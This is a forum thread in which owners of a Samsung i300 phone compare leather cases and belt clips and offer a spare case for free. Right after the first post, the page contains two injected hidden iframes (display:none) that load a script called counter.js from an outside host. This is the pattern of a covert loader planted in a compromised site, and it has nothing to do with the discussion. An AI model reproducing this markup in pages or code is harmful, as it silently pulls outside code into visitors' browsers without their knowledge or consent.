+ Reply to Thread

Question Sprint's Leather Case with Belt Clip?

Has anyone seen this case yet? I was wondering if i should get it. It has room for the extended battery as well. I've had my phone for about 3 weeks now and I love it. But all I can do is throw it in my pocket.

-jet<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

That's the case from Sprint? *GAG* thanks for the info man.

-jet

I have the Samsung case - don't waste your money. I realized just how easily the flimsy belt clip dislodges when my phone disappeared one day. Luckily it had fallen off in the car. I've resorted to a tacky pager safety chain and Superglue until something better appears. Not to mention you need to uncase the phone to use it. A better thought-out case would have a flip window IMO.

I'm using the Sprint PCS Leather Case with belt clip. I hated the case at first but its starting to grow on me. I like the way it sits sideways on the belt but I don't like the fact that I can't swivel the clip to view an incoming call. You also have to remove the phone from the case. The case is well made and does a good job of protecting the phone. In addition, the belt clip is very sturdy and won't fall off (like the Sanyo / Target case). The case is very snug at first but breaks in very well after a day's use.

Well, my experience with the plastic belt clip is very different - seems to pop off every other time I sit down. Wait a second - could it really be midriff bulge and not the crappy case? Oh my gawd!

Smile great way to carry the i300...

Try www.eholster.com these guys sell a slick underarm arrangement that can be used for a variety of items. Much cooler than a beltclip in general, also safer bang-up wise I think.

Also www.cellphoneholster.com has options but they were temp down a couple of weeks ago.

need a Case!

Does anybody want to either sell/trade/or give me the crappy case that comes with the i300? I lost mine.
    Thanks.
    chris@eclipsing.com

Cool Free Phone Case

Sure, I have the one that came with the phone. Give me your mailing info and I'll send it to you...FREE! John Mc
    JJMc

Thumbs up Nautica Leather phone case for Nokia

The Nautica Leather phone case for the Nokia phone is a 'PERFECT' fit for the I300. It's very well made, Has a easy flap and quick remove belt clip. Retail is $49.99, I found mine at Marsalls/TJ Max for $9.99! Also at the Nautica outlets...
    Really a GREAT case!! John Mc

Administrator

Re: Nautica Leather phone case for Nokia

Originally posted by CBhomesold
    The Nautica Leather phone case for the Nokia phone is a 'PERFECT' fit for the I300. It's very well made, Has a easy flap and quick remove belt clip. Retail is $49.99, I found mine at Marsalls/TJ Max for $9.99! Also at the Nautica outlets...
    Really a GREAT case!! John Mc
    can you post a pic or if not give us as much info as you can on it.

Unhappy

I'll try to get that posted soon... I having trouble downloading the picture of the Nautica case from my digital camera... John Mc